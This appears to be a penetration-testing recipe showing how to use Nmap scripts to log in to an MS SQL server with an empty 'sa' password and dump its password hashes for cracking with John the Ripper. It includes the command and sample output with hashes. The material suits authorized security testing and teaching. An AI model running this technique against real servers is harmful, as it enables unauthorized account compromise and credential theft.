After gaining access to an MS SQL server, we can dump all of the password hashes of an MS SQL server to compromise other accounts. Nmap can help us to retrieve these hashes in a format usable by the cracking tool, John the Ripper.
This recipe shows how to dump crackable password hashes of an MS SQL sever with Nmap.
To dump all the password hashes of an MS SQL server with an empty sysadmin password, run the following Nmap command:
$ nmap -p1433 --script ms-sql-empty-password,ms-sql-dump-hashes <target>
The password hashes will be included in the ms-sql-dump-hashes script output section:
PORT STATE SERVICE VERSION 1433/tcp open ms-sql-s Microsoft SQL Server 2011 Service Info: CPE: cpe:/o:microsoft:windows Host script results: | ms-sql-empty-password: | [192.168.1.102MSSQLSERVER] |_ sa:<empty> => Login Success | ms-sql-dump-hashes: | [192.168.1.102MSSQLSERVER] | sa:0x020039AE3752898DF2D260F2D4DC7F09AB9E47BAB2EA3E1A472F49520C26E206D0613E34E92BF929F53C463C5B7DED53738A7FC0790DD68CF1565469207A50F98998C7E5C610 | ##MS_PolicyEventProcessingLogin##:0x0200BB8897EC23F14FC9FB8BFB0A96B2F541ED81F1103FD0FECB94D269BE15889377B69AEE4916307F3701C4A61F0DFD9946209258A4519FE16D9204580068D2011F8FBA7AD4 |_ ##MS_PolicyTsqlExecutionLogin##:0x0200FEAF95E21A02AE55D76F68067DB02DB59AE84FAD97EBA7461CB103361598D3683688F83019E931442EC3FB6342050EFE6ACE4E9568F69D4FD4557C2C443243E240E66E10
MS SQL servers usually run on TCP port 1433. The argument -p1433 --script ms-sql-empty-password,ms-sql-dump-hashes initiates the script ms-sql-empty-password, which finds an empty root sysadmin account, and then runs script ms-sql-dump-hashes if an MS SQL server is found running on port 1433.
The script ms-sql-dump-hashes was written by Patrik Karlsson and its function is to retrieve password hashes of MS SQL servers in a format usable by cracking tools like John the Ripper. This script depends on the mssql library. You can learn more about it at http://nmap.org/nsedoc/lib/mssql.html.
If an SMB port is open, you can use it to run this script using pipes by setting the arguments mssql.instance-all or mssql.instance-name:
PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | ms-sql-empty-password: | [192.168.1.102MSSQLSERVER] |_ sa:<empty> => Login Success | ms-sql-dump-hashes: | [192.168.1.102MSSQLSERVER] | sa:0x020039AE3752898DF2D260F2D4DC7F09AB9E47BAB2EA3E1A472F49520C26E206D0613E34E92BF929F53C463C5B7DED53738A7FC0790DD68CF1565469207A50F98998C7E5C610 | ##MS_PolicyEventProcessingLogin##:0x0200BB8897EC23F14FC9FB8BFB0A96B2F541ED81F1103FD0FECB94D269BE15889377B69AEE4916307F3701C4A61F0DFD9946209258A4519FE16D9204580068D2011F8FBA7AD4 |_ ##MS_PolicyTsqlExecutionLogin##:0x0200FEAF95E21A02AE55D76F68067DB02DB59AE84FAD97EBA7461CB103361598D3683688F83019E931442EC3FB6342050EFE6ACE4E9568F69D4FD4557C2C443243E240E66E10